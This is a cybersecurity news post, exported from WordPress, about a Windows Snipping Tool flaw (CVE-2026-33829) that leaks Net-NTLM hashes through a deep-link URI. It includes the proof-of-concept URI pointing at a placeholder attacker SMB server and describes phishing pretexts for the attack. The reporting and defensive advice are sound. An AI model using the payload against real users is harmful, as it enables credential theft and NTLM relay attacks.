{"id":12270,"date":"2026-04-21T10:04:15","date_gmt":"2026-04-21T10:04:15","guid":{"rendered":"https:\/\/serisec.com\/index.php\/2026\/04\/21\/poc-exploit-released-for-windows-snipping-tool-ntlm-hash-leak-vulnerability\/"},"modified":"2026-04-21T10:04:15","modified_gmt":"2026-04-21T10:04:15","slug":"poc-exploit-released-for-windows-snipping-tool-ntlm-hash-leak-vulnerability","status":"publish","type":"post","link":"https:\/\/serisec.com\/index.php\/2026\/04\/21\/poc-exploit-released-for-windows-snipping-tool-ntlm-hash-leak-vulnerability\/","title":{"rendered":"PoC Exploit Released for Windows Snipping Tool NTLM Hash Leak Vulnerability"},"content":{"rendered":"<p>    PoC Exploit Released for Windows Snipping Tool NTLM Hash Leak Vulnerability<br \/>\n \t<BR><br \/>\n<BR><\/BR><br \/>\n    <!-- no image --><br \/>\n \t<BR><br \/>\n<BR><\/BR><\/p>\n<div>\n<p>A proof-of-concept (PoC) exploit has been publicly released for a newly disclosed vulnerability in Microsoft\u2019s Snipping Tool that allows attackers to silently steal users\u2019 Net-NTLM credential hashes by luring them to a malicious webpage.<\/p>\n<p>Tracked as CVE-2026-33829, the flaw resides in how <a href=\"https:\/\/cybersecuritynews.com\/windows-snipping-tool-vulnerability\/\" target=\"_blank\" rel=\"noreferrer noopener\">Windows Snipping Tool handles deep link URI registrations<\/a> using the <code>ms-screensketch<\/code> protocol schema. Affected versions of the application register this deep link, which accepts a <code>filePath<\/code> parameter.<\/p>\n<p>Due to a lack of proper input validation, an attacker can supply a UNC path pointing to a remote, attacker-controlled SMB server, coercing an authenticated SMB connection and capturing the victim\u2019s Net-NTLM hash in the process.<\/p>\n<p>The vulnerability was discovered and reported by security researchers at Black Arrow, who coordinated disclosure with Microsoft prior to going public.<\/p>\n<h2 class=\"wp-block-heading\" id=\"how-the-attack-works\"><strong>Windows Snipping Tool PoC<\/strong><\/h2>\n<p>Exploitation requires minimal technical sophistication. An attacker simply needs to host a malicious URL \u2014 or an HTML page that auto-triggers the deep link and convince the target to visit it. The <a href=\"https:\/\/github.com\/blackarrowsec\/redteam-research\/tree\/master\/CVE-2026-33829\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">PoC from Black Arrow Security demonstrates<\/a> the attack with a single browser-triggered URI:<\/p>\n<pre class=\"wp-block-preformatted\">text<code>ms-screensketch:edit?&amp;filePath=\\&lt;attacker-smb-server&gt;file.png&amp;isTemporary=false&amp;saved=true&amp;source=Toast<\/code><\/pre>\n<p>When a victim opens this link, Snipping Tool launches and silently attempts to load the remote resource over SMB. During this connection attempt, Windows automatically transmits the user\u2019s Net-NTLM authentication response to the attacker\u2019s server, exposing credentials that can then be cracked offline or used in NTLM relay attacks against internal network resources.<\/p>\n<figure class=\"wp-block-image size-large\"><img data-recalc-dims=\"1\" decoding=\"async\" src=\"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhJzHfTiqMx3F63jt8ahcD8pQVPXP8C6RWMoIGGxJfaq8To2mdVx_n5-ZLjS0lghz1VmoYGXD_p2jxCBdTsTxM-DpjuYDxgUdR5OcmAAXj4_lzerB-weik_x60i1ITyL4g5LsjgC4zpWVD8BQxqWpX90FuUlJdUL2Z0YjyuAZNAYivjtMXpkagI5AemfoH_\/s16000\/Snipping%2520PoC.webp?ssl=1\" alt=\"\"><\/figure>\n<p>What makes CVE-2026-33829 particularly dangerous is how naturally it lends itself to <a href=\"https:\/\/cybersecuritynews.com\/cybercriminals-abuse-irs-and-tax-filing-lures\/\" target=\"_blank\" rel=\"noreferrer noopener\">social engineering campaigns<\/a>. Because the Snipping Tool actually opens during exploitation, the attack is visually consistent with believable pretexts such as asking an employee to crop a corporate wallpaper, edit a badge photo, or review an HR document.<\/p>\n<p>An attacker could register a domain like <code>snip.example.com<\/code> and serve a convincing image URL that silently delivers the malicious deep link payload behind the scenes.<\/p>\n<p>The victim sees nothing unusual; the Snipping Tool opens as expected while <a href=\"https:\/\/cybersecuritynews.com\/hackers-exploit-ntlm-authentication-flaws-to-target-windows-systems\/\" target=\"_blank\" rel=\"noreferrer noopener\">NTLM authentication<\/a> occurs transparently in the background.<\/p>\n<p>This attack vector is especially effective in corporate environments where phishing emails referencing internal HR portals, IT helpdesks, or shared document systems are common.<\/p>\n<h2 class=\"wp-block-heading\" id=\"patch-availability-and-timeline\"><strong>Patch Availability and Timeline<\/strong><\/h2>\n<p>Microsoft addressed the vulnerability in its <a href=\"https:\/\/cybersecuritynews.com\/microsoft-patch-tuesday-april-2026\/\" target=\"_blank\" rel=\"noreferrer noopener\">April 14, 2026, Patch Tuesday security update<\/a>. The disclosure timeline is as follows:<\/p>\n<ul class=\"wp-block-list\">\n<li>March 23, 2026 \u2014 Vulnerability reported to Microsoft.<\/li>\n<li>April 14, 2026 \u2014 Microsoft releases a security patch.<\/li>\n<li>April 14, 2026 \u2014 Coordinated public advisory and PoC release.<\/li>\n<\/ul>\n<p>Organizations and individual users running affected versions of the Windows Snipping Tool should immediately apply the April 14, 2026, security update.<\/p>\n<p>Security teams should also monitor internal networks for unexpected outbound SMB connections (port 445) to external or unknown hosts, which could indicate active exploitation attempts. Blocking outbound SMB traffic at the network perimeter remains a strong defensive measure regardless of patch status.<\/p>\n<p class=\"has-text-align-center has-background\" style=\"background:linear-gradient(180deg,rgb(238,238,238) 94%,rgb(169,184,195) 100%)\"><strong>Follow us on <a href=\"https:\/\/news.google.com\/publications\/CAAqMggKIixDQklTR3dnTWFoY0tGV041WW1WeWMyVmpkWEpwZEhsdVpYZHpMbU52YlNnQVAB?hl=en-IN&amp;gl=IN&amp;ceid=IN:en\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">Google News<\/a>, <a href=\"https:\/\/www.linkedin.com\/company\/cybersecurity-news\/\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">LinkedIn<\/a>, and <a href=\"https:\/\/x.com\/cyber_press_org\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">X<\/a> for daily cybersecurity updates. <a href=\"https:\/\/cybersecuritynews.com\/contact-us\/\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">Contact us<\/a> to feature your stories.<\/strong><\/p>\n<p>The post <a href=\"https:\/\/cybersecuritynews.com\/windows-snipping-tool-ntlm-hash\/\">PoC Exploit Released for Windows Snipping Tool NTLM Hash Leak Vulnerability<\/a> appeared first on <a href=\"https:\/\/cybersecuritynews.com\/\">Cyber Security News<\/a>.<\/p>\n<\/div>\n<p> \t<BR><br \/>\n <BR><\/BR><br \/>\n    Guru Baran<br \/>\n \t<BR><br \/>\n<BR><\/BR><br \/>\n<a href=\"https:\/\/cybersecuritynews.com\/windows-snipping-tool-ntlm-hash\/\">Go to cyber-security-news<\/a><br \/>\n \t<BR><br \/>\n <BR><\/BR><\/p>\n","protected":false},"excerpt":{"rendered":"<p>PoC Exploit Released for Windows Snipping Tool NTLM Hash Leak Vulnerability A proof-of-concept (PoC) exploit has been publicly released for a newly disclosed vulnerability in Microsoft\u2019s Snipping Tool that allows attackers to silently steal users\u2019 Net-NTLM credential hashes by luring them to a malicious webpage. Tracked as CVE-2026-33829, the flaw resides in how Windows Snipping [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[129,63],"tags":[130],"class_list":["post-12270","post","type-post","status-publish","format-standard","hentry","category-cyber-security","category-cyber-security-news","tag-cyber-security-news"],"_links":{"self":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/posts\/12270"}],"collection":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/comments?post=12270"}],"version-history":[{"count":0,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/posts\/12270\/revisions"}],"wp:attachment":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/media?parent=12270"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/categories?post=12270"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/tags?post=12270"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}